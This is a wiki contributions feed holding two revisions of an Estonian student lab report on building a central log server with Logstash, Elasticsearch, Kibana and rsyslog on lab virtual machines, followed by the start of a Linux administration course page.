<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Saus</id>
	<title>ICO wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Saus"/>
	<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php/Special:Contributions/Saus"/>
	<updated>2026-05-10T11:35:21Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=69526</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=69526"/>
		<updated>2013-12-05T11:24:14Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 13.04&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ja faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;br /&gt;
&lt;br /&gt;
= Kaitsmine =&lt;br /&gt;
syslogng, logstash ja rsyslog&lt;br /&gt;
&lt;br /&gt;
Logstashi installeerimine on väga lihtne ja ainukeseks piiranguks (sõltuvuseks) on java olemasolu. Logstash on väga skaleeruv ja lihtsasti hallatav. Logstashi saab saata logisid erinevatest sisenditest - ei ole piiratud ainult syslogi-saatvate operatsioonisüsteemidega.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=69525</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=69525"/>
		<updated>2013-12-05T10:25:28Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Ülesande püstitus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 13.04&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ja faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=69524</id>
		<title>Linuxi administreerimine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=69524"/>
		<updated>2013-12-05T10:08:42Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Esseede teemad 2013 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Üldinfo=&lt;br /&gt;
ECTS: 4&lt;br /&gt;
Hindamisviis: Eksam&lt;br /&gt;
&lt;br /&gt;
==Õppejõud==&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Katrin Loodus&lt;br /&gt;
&lt;br /&gt;
=Eeldused ja sihtgrupp=&lt;br /&gt;
&lt;br /&gt;
